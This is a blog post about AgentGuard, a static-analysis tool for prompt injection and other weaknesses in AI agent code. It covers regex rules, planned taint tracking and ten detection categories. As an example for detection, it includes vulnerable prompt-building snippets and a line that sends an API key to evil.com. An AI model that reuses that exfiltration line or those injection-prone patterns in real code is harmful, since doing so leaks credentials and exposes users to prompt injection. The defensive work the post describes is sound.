# Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities

> Source: <https://dev.to/dockfixlabs/beyond-regex-building-detection-rules-for-ai-agent-vulnerabilities-hi3>
> Published: 2026-06-28 22:45:51+00:00

When I started building [AgentGuard](https://github.com/dockfixlabs/agentguard), the first question was: how do you detect a prompt injection vulnerability in source code?

Unlike traditional vulnerabilities (SQL injection, XSS), prompt injection doesn't have a single signature. It's a pattern of **untrusted data flowing into LLM context**. The vulnerability isn't in a function call -- it's in how data is constructed.

Every SAST tool starts with pattern matching. AgentGuard's first layer is regex-based rules:

```
# ASI01: Prompt Injection
FSTRING_INJECTION = re.compile(
    r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
    re.I
)
```

This catches the most common pattern: f-strings that embed user input directly into LLM prompts. It is blunt but effective. In a scan of 50 open-source agent codebases, this single rule found 127 instances.

Regex has limits. Consider:

```
# Pattern A: Obvious
prompt = f"You are a helper. {user_input}"

# Pattern B: Subtle
template = "You are a helper. {input}"
prompt = template.format(input=user_data)

# Pattern C: Hidden
messages = [{"role": "system", "content": config["system_prompt"] + user_message}]
```

Pattern A is trivial to detect. Pattern B requires understanding `.format()`

semantics. Pattern C requires tracking data flow through dictionaries and list construction.

This is where AgentGuard is headed next: **AST-based semantic analysis**.

The next version of AgentGuard will parse Python and JavaScript ASTs to track taint flow:

`user_input`

, `query`

, `message`

, `request.body`

`openai.chat.completions.create`

, `prompt`

, `messages`

, `system`

This is the same approach Semgrep and CodeQL use for traditional vulnerabilities, but specialized for LLM-specific sinks.

AgentGuard already does a simple form of correlation for ASI03 (Data Exfiltration):

```
# Line 1: Secret access
api_key = os.environ.get("API_KEY")

# Line 2: Network call
requests.post("https://evil.com/collect", headers={"Auth": api_key})
```

The rule checks if a secret-access pattern appears on line N and a network-exfiltration pattern appears on line N+1. This catches the most dangerous pattern: an agent that reads credentials and sends them externally.

Future versions will extend this to full function-level taint tracking.

AgentGuard currently covers all 10 categories:

| ASI | Rule | Detection Method |
|---|---|---|
| ASI01 | Prompt Injection | Regex (f-string, concat, format) |
| ASI02 | Tool Abuse | Regex (os.system, subprocess, eval) |
| ASI03 | Data Exfiltration | Regex + cross-line correlation |
| ASI04 | Excessive Agency | Regex (auto-execute, no-confirm) |
| ASI05 | Supply Chain | Regex (untrusted pip install, dynamic import) |
| ASI06 | Insecure Output | Regex (raw HTML, eval output) |
| ASI07 | Credential Exposure | Regex (API keys, private keys, passwords) |
| ASI08 | Context Manipulation | Regex (context stuffing, token bombing) |
| ASI09 | Agent Loop Exploitation | Regex (recursive calls, no depth limit) |
| ASI10 | Trust Boundary | Regex (mixed privilege, cross-agent calls) |

The [benchmark suite](https://github.com/dockfixlabs/agentguard-benchmark) has 28 samples:

The long-term goal is simple: **make AI agent code as auditable as web application code**. We have Semgrep for web apps. We need AgentGuard for agent apps.

[AgentGuard](https://github.com/dockfixlabs/agentguard) is MIT-licensed and open source. Install with `pip install dfx-agentguard`

.
